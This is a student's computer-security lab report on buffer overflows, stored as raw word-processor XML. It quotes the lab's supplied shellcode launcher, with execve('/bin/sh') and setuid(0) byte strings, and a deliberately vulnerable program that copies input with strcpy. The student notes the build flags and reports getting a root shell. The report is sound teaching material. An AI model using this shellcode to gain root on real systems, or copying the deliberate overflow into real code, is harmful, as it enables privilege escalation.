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Austin Decker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CS 445 – Computer Security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4 October 2024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bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Lab03 Report:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1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Environment Setup:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Below is a screenshot showing proof of my environment being set up for the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553085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="41160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u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>pcoming tasks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1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Task 01: Getting Familiar With Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="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60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ran the makefile as instructed in the provided BufferOverflow.pdf.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">The code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>used for compilation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> was provided to me:</w:t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rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono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#include &lt;stdlib.h&gt;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#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
        <w:ind w:end="0" w:hanging="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#include &lt;string.h&gt;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 xml:space="preserve">// Binary code for setuid(0) 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// 64-bit:  "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"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// 32-bit:  "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"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const char shellcode[] =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#if __x86_64__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>"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"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>"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"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>"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"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#else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>"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"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>"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"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>"\xd2\x31\xc0\xb0\x0b\xcd\x80"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#endif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;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int main(int argc, char **argv)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ab/>
        <w:t>{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char code[500];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strcpy(code, shellcode);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int (*func)() = (int(*)())code;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func();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="240"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  <w:tab/>
        <w:t>return 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading10"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="both"/>
        <w:rPr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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Observations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0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When running the makefile to compile the call_shellcode.c I noticed that the execstack was used during the compilation process. This is important as it allows the badfile to run code within the stack of the victim program. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>I also noticed the -m32 flag was used. This means that the program was compiled for 32bit architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0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When I ran the compiled program, I noticed that the program successfully gave me a root shell, as shown in the below screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="both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6070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T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ask 02: Understanding the Vulnerable Program</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>This is the code for the provided lab that has the buffer overflow vulnerability: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&lt;stdlib.h&gt;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&lt;stdio.h&gt;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&lt;string.h&gt;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/* Changing this size will change the layout of the stack.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>* Instructors can change this value each year, so students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>* won't be able to use the solutions from the past.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>*/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#ifndef BUF_SIZE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#define BUF_SIZE 100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#endif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void dummy_function(char *str);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 bof(char *str)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char buffer[BUF_SIZE];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// The following statement has a buffer overflow problem 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strcpy(buffer, str);       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1;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 main(int argc, char **argv)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char str[517];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FILE *badfile;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badfile = fopen("badfile", "r"); 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if (!badfile) {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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>perror("Opening badfile"); exit(1);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length = fread(str, sizeof(char), 517, badfile);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printf("Input size: %d\n", length);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dummy_function(str);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fprintf(stdout, "==== Returned Properly ====\n");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1;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// This function is used to insert a stack frame of size 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// 1000 (approximately) between main's and bof's stack frames. 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// The function itself does not do anything. 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void dummy_function(char *str)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char dummy_buffer[1000];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memset(dummy_buffer, 0, 1000);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bof(str);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
        <w:ind w:start="720" w:end="0" w:hanging="0"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TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="140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6</Pages>
  <Words>352</Words>
  <Characters>2233</Characters>
  <CharactersWithSpaces>2656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2024-09-26T13:44:02Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-26T14:44:00Z</dcterms:modified>
  <cp:revision>4</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>